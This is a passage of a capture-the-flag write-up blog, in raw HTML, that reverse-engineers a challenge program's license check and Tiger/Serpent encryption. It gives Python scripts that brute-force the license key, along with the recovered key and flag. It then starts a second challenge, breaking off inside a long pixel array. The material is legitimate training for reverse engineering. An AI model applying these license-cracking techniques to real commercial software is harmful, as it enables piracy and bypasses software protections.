https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-89-300x223.png 300w\" sizes=\"auto, (max-width: 602px) 100vw, 602px\" \/><\/figure>\n\n\n\n<p>The first function (FUN_00100e2a) is for checking the license string:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"720\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90.png\" alt=\"\" class=\"wp-image-1853\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90.png 790w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90-300x273.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90-768x700.png 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/figure>\n\n\n\n<p>The license check does mainly 4 things to evaluate if the license is correct:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Line 15-17:<\/strong> the license needs to be 29 characters long<\/li>\n\n\n\n<li><strong>Line 18-23:<\/strong> Every 6th character needs to be a dash &#8220;-&#8220;<\/li>\n\n\n\n<li><strong>Line 24-27:<\/strong> Defines the character set for the characters between the &#8220;-&#8220;: 0-9; A-Z; a-z<\/li>\n\n\n\n<li><strong>Line 30-37:<\/strong> Sends groups of five characters, between the &#8220;-&#8220;, to FUN_00102716 and checks the first 3 of 5 (!) if they match with the corresponding characters of the string &#8220;S4nT4s3NcrYpt0r&#8221;. 1st -&gt; &#8220;S4n&#8221;, 2nd -&gt; &#8220;T4s&#8221;, 3rd -&gt; &#8220;3Nc&#8221;, 4th -&gt; &#8220;rYp&#8221;, 5th -&gt; &#8220;t0r&#8221;<\/li>\n<\/ol>\n\n\n\n<p>The function FUN_00102716 must be some hashing algorithm. Let us examine this function next. One of the functions called by FUN_00102716 is this one:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"562\" height=\"384\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-91.png\" alt=\"\" class=\"wp-image-1854\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-91.png 562w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-91-300x205.png 300w\" sizes=\"auto, (max-width: 562px) 100vw, 562px\" \/><\/figure>\n\n\n\n<p>We google for the constant &#8220;0xa5a5a5&#8230;&#8221; end eventually find <a href=\"http:\/\/www.cas.mcmaster.ca\/~cs3is3\/course-files\/LN6-2021.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">a presentation about hash functions<\/a> and there we find one function called &#8220;Tiger hash&#8221; which exactly matches our description. <\/p>\n\n\n\n<p>We have everything to bruteforce the license-key. But first we want to understand the whole application. Let&#8217;s go back to the main function:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"630\" height=\"420\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-92.png\" alt=\"\" class=\"wp-image-1855\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-92.png 630w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-92-300x200.png 300w\" sizes=\"auto, (max-width: 630px) 100vw, 630px\" \/><\/figure>\n\n\n\n<p>The main function checks the license, then calls the tiger_hash function once again with the license key (!) and sends the computed hash to the function FUN_00100b14. The next step is to look at this last unknown function, which must be the encryption function.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"715\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-715x1024.png\" alt=\"\" class=\"wp-image-1857\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-715x1024.png 715w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-210x300.png 210w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-768x1099.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-1073x1536.png 1073w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1.png 1312w\" sizes=\"auto, (max-width: 715px) 100vw, 715px\" \/><\/figure>\n\n\n\n<p>I highlighted the important parts of the disassembled encryption function.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Line 65:<\/strong> Call to a sub-function. Where we find the actual encryption algorithm. In this function we find the constant 0x9e3779b9 which I googled for. Eventually, I found this <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/Chronic-Dev\/libgcrypt\/blob\/master\/cipher\/serpent.c\" target=\"_blank\">implementation of the Serpent encryption algorithm<\/a> which looked exactly like our program. <\/li>\n\n\n\n<li><strong>Line 74: <\/strong>The tiger_hash function is called once again, with the hashed license key we called this function with. See lines 37, 69, 72 to see how the argument for the tiger_hash function is constructed.<\/li>\n\n\n\n<li><strong>Line 101:<\/strong> The result of the tiger_hash function (hashed hash of the license key) is written to a file.<\/li>\n\n\n\n<li><strong>Line 93:<\/strong> The filename ends with &#8220;.enc&#8221;. <\/li>\n\n\n\n<li><strong>Line 106:<\/strong> The encrypted message is appended to the same file. <\/li>\n<\/ol>\n\n\n\n<p>We now have figured out everything we need to solve the challenge. This program was used to encrypt a message and store it in the gift.enc file. The first bytes of the gift.enc file contain the hash of the hash of the license! The target hash:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\"6385EF2616C572906C5363A990D41AA9D36AFAA02E1485A7\" <\/pre>\n\n\n\n<p>I used Python and this <a rel=\"noreferrer noopener\" href=\"https:\/\/pypi.org\/project\/tiger\/\" target=\"_blank\">tiger-hash library<\/a>. Unfortunately, this library has a memory leak and I had to save intermediate results and resume the program after my computer killed the program because of Out of Memory errors. <\/p>\n\n\n\n<p>In this first Python script I collect all possible groups of 5 for our license key. As for every group the hash is calculated and the first 3 characters are compared with the corresponding part in the string &#8220;<span style=\"font-size: revert;\">S4nT4s3NcrYpt0r&#8221;<\/span>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nfrom tiger import tiger\nfrom itertools import chain, product, islice\nfrom binascii import hexlify\nimport string\nt = [b\"S\",b\"4\",b\"n\",b\"T\",b\"4\",b\"s\",b\"3\",b\"N\",b\"c\",b\"r\",b\"Y\",b\"p\",b\"t\",b\"0\",b\"r\"]\ncharset = string.ascii_letters + string.digits\nSTART_VALUE = [4, 764688524]\no = 0\nparts = []\nwhile (o &lt; 0x1d):\n\ti = 0\n\tst = b\"\"\n\twhile(i &lt; 3):\n\t\tx = int(i + (o \/ 6) * 3)\n\t\tst += t[x]\n\t\ti += 1\n\tparts.append(st)\n\to += 6\nprint(parts)\ndef convertTuple(tup):\n    str = ''\n    for item in tup:\n        str = str + item\n    return str\nsolutions = []\nparts = islice(parts, START_VALUE[0], None)\nfor c, part in enumerate(parts, start=START_VALUE[0]):\n\tprint(part)\n\tref = hexlify(part).lower()\n\tall_combos = product(charset, repeat=5)\n\tcombos = islice(all_combos, START_VALUE[1], None)\n\tsol = []\n\tfor i,current in enumerate(combos, start=START_VALUE[1]):\n\t\ttmp = convertTuple(''.join(current)).encode(\"utf8\")\n\t\th = tiger(tmp).hexdigest()[:6]\n\t\tif (h == ref):\n\t\t\tsol.append(tmp)\n\t\t\tSTART_VALUE[1] = i\n\t\t\tprint(\"Found!\")\n\t\t\tprint(\"Test: \" + str(tmp))\n\t\t\tprint(\"Hash: \" + str(h))\n\t\t\tprint(\"ToBeFound: \" + ref)\n\t\t\tprint(\"Solution: \" + str(sol))\n\t\t\tprint(\"All possibilities: \" + str(solutions))\n\t\t\tprint(START_VALUE)\n\t\t\tprint(\"---\")\n\tsolutions.append(sol)\n\tSTART_VALUE = [c+1, 0]\n\t<\/pre>\n\n\n\n<p>In the second script I calculate the correct license out of all possible groups which I generated before. This way we get back the license which was used to write the gift.enc file. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nimport tiger\nfrom itertools import chain, product, islice\nfrom binascii import hexlify\nimport string\ntarget_hash = \"6385EF2616C572906C5363A990D41AA9D36AFAA02E1485A7\"\nSTART_VALUE = 25\ngroup1 = ['adlsB', 'coFWX', 'dAVjd', 'eqvsO', 'gyfiM', 'gDaZS', 'gIT3S', 'hsotk', 'itmd8', 'juIhA', 'kVDgs', 'ot5ke', 'o3rKT', 'o4YUM',\n\t\t\t\t            'tYHqG', 'uPfTb', 'uUxaL', 'uVJTg', 'vohtO', 'vYE7S', 'x8U0P', 'yUokP', 'zdvgw', 'BXb55', 'Fumzi', 'Gi2vt',\n\t\t\t\t            'Gr16b', 'G007k', 'JxrBh', 'MDgmm', 'MKHsL', 'NtkxJ', 'P3J7T', 'SNmHu', 'TuA2q', 'T7yjy', 'UlwxL', 'UreDP',\n\t\t\t\t            'U0rOF', 'VbVZM', 'V3obI', 'WFego', 'ZSWc9', '2gLoy', '2Aqll', '3AQfq', '7Fy7d', '8pasV']\ngroup2 = ['bnXWw', 'cfr8M', 'ctl8u', 'ddmFi', 'eAA82', 'eUeDp', 'eXn2h', 'fgaRU', 'fO9Rt', 'iXpFk', 'kECUl', 'lVkn8', 'l5Bve', 'ma5a6',\n\t\t\t\t\t\t    'mjhEz', 'm2iX2', 'nbMi8', 'oqOJe', 'rx6C3', 'tt4w2', 'tSSW5', 't9ilq', 'uRZXH', 'u51ZZ', 'vL7It', 'xMtqG',\n\t\t\t\t\t\t    'ytB9l', 'yJsK2', 'APM7L', 'A3PM0', 'A4ifz', 'A7368', 'CIost', 'DvIZk', 'D8yjm', 'EbkvT', 'EwNHN', 'FMwBO',\n\t\t\t\t\t\t    'IGm3M', 'JGk2f', 'J9eRW', 'OUSxb', 'QFhcz', 'Riazr', 'RAGLI', 'Sd5gV', 'SulIF', 'TwEDx', 'TI3CF', 'TP5Zo',\n\t\t\t\t\t\t    'UKiVs', 'VwoN6', 'VR4Hu', 'XhF9Y', '1RKc2', '2c2Kt', '2kwdU', '2wA68', '2x11q', '4uHIW', '42a9V', '6rLr9',\n\t\t\t\t\t\t    '6stx2', '63zRg', '8jIpC']\ngroup3 = ['azD5T', 'a0Pc4', 'csWhR', 'fiixd', 'fp79w', 'fOKC5', 'gdrFr', 'ieUt4', 'iOAMl', 'kfOy5', 'n9yiN', 'qDVZ5', 'qKB1V', 'r5xAG',\n\t\t\t\t\t\t    'sivTf', 'tLFTx', 'uDM8s', 'vOIzV', 'xmpWp', 'zIx0G', 'BAYEj', 'DtC4I', 'DvE2a', 'DVk9a', 'ElnXm', 'FTpcE',\n\t\t\t\t\t\t    'GKhdq', 'GVanO', 'G0p1a', 'HQboL', 'Nvv07', 'NGdwR', 'Otk5A', 'OAM1e', 'PeN1g', 'P66qO', 'QmupY', 'QN4lW',\n\t\t\t\t\t\t    'SjqYr', 'Skiv5', 'TYDLC', 'UE7A2', 'WssIl', 'WK8eQ', 'XwgNE', 'XDh6A', 'ZdOP9', 'ZfSdH', 'ZhScA', 'ZE1gc',\n\t\t\t\t\t\t    '13XB7', '3cOM8', '31SHQ', '41Itd', '5tnCy', '5RXrU', '8BBSg', '9nzmk', '9CIrU']\ngroup4 = ['bPDoZ', 'fthoz', 'jqEML', 'nlUcI', 'pT3NQ', 'pZFRf', 'quvHH', 's0B4F', 'tIxoq', 'uRWYx', 'vRnkK', 'ySLHn', 'CXcQj', 'DhdFn',\n\t\t\t\t\t\t\t'D0t0J', 'Fts7Y', 'GbzeZ', 'KMG5Y', 'Mm6xs', 'MzKLg', 'OCD3u', 'PkwYk', 'PXF7S', 'Q5Ozd', 'Xkl6J', 'XUnff',\n\t\t\t\t\t\t\t'Y6KPZ', 'Zrlrl', '2fwBV', '2sMn6', '34PVW', '4lZzZ', '4nhP3', '6jraV', '82qlS']\ngroup5 = ['af79P', 'ayyIr', 'boeRp', 'bUNP2', 'd6yQz', 'elYSP', 'gKshj', 'gU7R8', 'idzju', 'iVa5n', 'jtuG0', 'jMUal', 'nHq5j', 'oQfpM',\n\t\t\t\t\t\t\t'oVLfh', 'o0Q24', 'puNbJ', 'u59v1', 'wtSLl', 'xoZ7j', 'xLgEy', 'yk4fu', 'yFSk6', 'yKMxT', 'yXUyL', 'zJbW3',\n\t\t\t\t\t\t\t'zMFUD', 'BM2Xl', 'BWAhp', 'CtBSX', 'CwyDD', 'DYDeW', 'EQrOx', 'HhyG6', 'KkarB', 'KIRjh', 'LEizD', 'MwTiP',\n\t\t\t\t\t\t\t'O17sm', 'PyYyE', 'QpxUh', 'TLtVK', 'UXhjd', 'VVEMT', 'VWjdf', 'Xob7u', 'ZUIz2', '2FM38', '23WOp', '3jLb2',\n\t\t\t\t\t\t\t'3r8UN', '5KM4W', '51y3N', '74CDh', '8LWcr', '9uBTE', '9Hb8Z']\ndef bruteforce():\n\tgrpslice = islice(group1, START_VALUE, None)\n\tfor x, a in enumerate(grpslice, start=START_VALUE):\n\t\tprint(\"[+] Iteration number: \" + str(x))\n\t\tfor b in group2:\n\t\t\tfor c in group3:\n\t\t\t\tfor d in group4:\n\t\t\t\t\tfor e in group5:\n\t\t\t\t\t\tlicense = a + \"-\" + b + \"-\" + c + \"-\" + d + \"-\" + e\n\t\t\t\t\t\t## double hash\n\t\t\t\t\t\th = tiger.tiger(license.encode(\"utf8\")).digest()\n\t\t\t\t\t\t## - make sure to hash the bytes and not the hexstring!\n\t\t\t\t\t\th = tiger.tiger((h)).hexdigest().upper()\n\t\t\t\t\t\tif h == target_hash:\n\t\t\t\t\t\t\tprint(\"[!! Target Hash Found - exit !!]\")\n\t\t\t\t\t\t\tprint(\"[> License Hash: \" + h)\n\t\t\t\t\t\t\tprint(\"[> Target Hash : \" + target_hash)\n\t\t\t\t\t\t\tprint(\"[>> Correct License is: \" + license)\n\t\t\t\t\t\t\treturn\nbruteforce()<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"414\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-1024x414.png\" alt=\"\" class=\"wp-image-1858\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-1024x414.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-300x121.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-768x311.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93.png 1286w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The license key which was used is: <strong>TuA2q-kECUl-n9yiN-82qlS-af79P<\/strong>. This license key hashed with tiger is our key to decrypt the gift.enc file. <\/p>\n\n\n\n<p>We need to remove the target hash from the file: <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"263\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-1024x263.png\" alt=\"\" class=\"wp-image-1859\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-1024x263.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-300x77.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-768x197.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94.png 1316w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Next is to calculate the tiger-hash of the license key, which results in:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">3147c884a90f10cea8664a5133cc5ae313b04d8271a534ad<\/pre>\n\n\n\n<p>And finally I used <a href=\"http:\/\/serpent.online-domain-tools.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">this online-tool<\/a> to decrypt the file. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"835\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-1024x835.png\" alt=\"\" class=\"wp-image-1860\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-1024x835.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-300x245.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-768x626.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95.png 1492w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{all_children_thank_you_for_saving_their_gifts}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.23] Pixel Perfect<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-41-1.png\" alt=\"\" class=\"wp-image-1742\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>Dr Nick<\/em>. Quite post-modern, isn&#8217;t it?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Finally, Santa has decided to reply to the Easter Bunny. He created a message scrolling across the screen and asked one of the elves to send it, but it seems they&#8217;ve sent it via a very low resolution channel.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-42-1024x256.png\" alt=\"\" class=\"wp-image-1743\"\/><\/figure>\n\n\n\n<p>Please connect to the following pixelization service<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/pixelization.idocker.vuln.land\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/pixelization.idocker.vuln.land\/<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Because it&#8217;s almost Christmas, neither Santa nor the elves have time now, so&#8230; Would you mind restoring the message and forwarding to the Easter Bunny? I mean, if that&#8217;s even possible!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This challenge was hard, mostly because it was very &#8220;guessy&#8221;&#8230; Consequently, I didn&#8217;t like this challenge at all. The source code of the JavaScript part within the website looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">var canvas = document.getElementById(\"canvasPixelization\");\n    var context = canvas.getContext(\"2d\");\n    let digits = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,12,12,12,12,12,12,12,4,0,0,4,12,12,12,12,12,12,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,24,28,32,36,40,44,36,32,32,36,44,40,36,32,28,24,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,28,36,44,52,60,68,76,68,64,64,68,76,68,60,52,44,36,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,60,72,84,96,108,100,96,96,100,108,96,84,72,60,48,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,104,116,104,100,100,104,116,104,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,108,120,108,104,104,108,120,108,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,112,124,112,108,108,112,124,112,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,116,128,116,112,112,116,128,116,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,116,128,116,112,112,112,124,112,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,80,92,116,128,112,108,108,108,120,108,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,64,76,88,100,120,132,112,104,104,104,116,104,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,72,84,96,108,124,136,116,104,100,100,108,96,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,76,92,108,120,132,144,124,112,104,100,100,88,76,64,52,40,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,76,92,108,120,132,140,116,100,88,80,76,64,52,44,36,28,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,68,84,100,112,124,132,108,92,80,68,60,48,36,28,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,48,60,72,84,96,108,116,92,80,72,60,52,40,28,20,12,8,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,80,92,104,116,100,92,88,80,72,60,48,36,24,16,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,100,112,100,96,96,92,88,76,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,44,56,68,80,92,108,104,108,112,108,104,92,80,64,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,28,36,48,64,80,96,116,116,124,132,128,120,104,88,68,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,28,36,48,64,84,104,124,124,132,140,136,128,108,88,68,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,28,36,48,60,76,92,112,112,120,128,124,120,104,88,68,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,40,48,56,68,80,96,92,96,104,104,104,92,80,64,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,40,48,56,64,72,84,76,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,40,52,60,68,76,84,72,68,68,60,60,52,44,36,28,20,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,64,72,80,88,96,84,72,64,52,52,44,36,28,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,56,72,80,88,96,100,80,60,52,44,48,40,32,28,24,24,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,60,76,80,84,88,88,64,44,40,36,48,44,40,40,40,36,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,56,68,68,68,68,68,48,32,32,36,56,56,56,56,52,44,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,52,60,60,60,60,64,48,32,36,48,72,72,72,68,60,52,44,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,56,68,72,76,80,88,72,56,56,68,92,88,84,76,68,60,52,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,60,76,84,92,100,108,96,76,72,84,108,100,92,84,76,68,60,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,64,80,92,100,108,116,104,84,76,92,112,104,96,88,80,72,64,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,56,68,80,88,96,104,92,76,72,88,104,96,88,80,72,64,56,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48,60,72,80,88,96,88,76,68,80,92,84,76,68,60,52,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,72,80,88,84,72,60,68,76,68,60,52,44,40,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,36,48,60,68,76,84,80,64,52,56,64,56,48,40,36,36,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,20,32,44,56,64,72,76,72,56,44,44,52,44,36,32,32,32,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,20,32,44,56,64,72,76,76,64,56,56,64,56,48,44,40,36,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,36,48,60,68,76,84,84,76,72,72,80,72,64,56,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,80,72,64,56,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,28,36,44,52,60,68,68,64,64,68,80,72,64,56,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,32,40,48,56,64,64,64,64,68,76,68,60,52,44,36,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,20,24,28,32,32,32,32,36,44,40,36,32,28,24,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,12,20,20,20,16,12,12,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,16,20,28,36,36,32,32,36,40,40,32,24,20,20,16,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,28,36,40,48,56,60,60,56,56,56,60,60,56,48,40,36,28,20,12,4,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,32,44,56,64,72,76,76,76,72,72,72,76,76,76,72,64,56,44,32,20,12,4,0,0,0,0,0,0,0,0,0,0,0,8,16,24,36,48,60,68,76,76,76,76,72,72,72,76,76,76,76,68,60,48,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,24,36,48,60,68,76,76,76,76,72,72,72,76,76,76,76,68,60,48,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,20,28,40,52,64,72,80,80,76,76,72,72,76,80,80,80,80,72,64,52,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,24,32,44,56,68,76,84,84,76,76,72,72,80,84,84,84,84,76,68,56,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,28,40,56,72,88,100,112,112,100,100,96,96,104,104,100,100,100,88,76,60,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,32,44,60,76,92,108,120,120,104,104,104,104,112,104,96,96,96,84,68,52,28,20,16,8,0,0,0,0,0,0,0,0,0,0,0,8,32,44,60,76,92,108,120,124,112,112,112,112,120,108,96,88,84,72,56,40,16,12,12,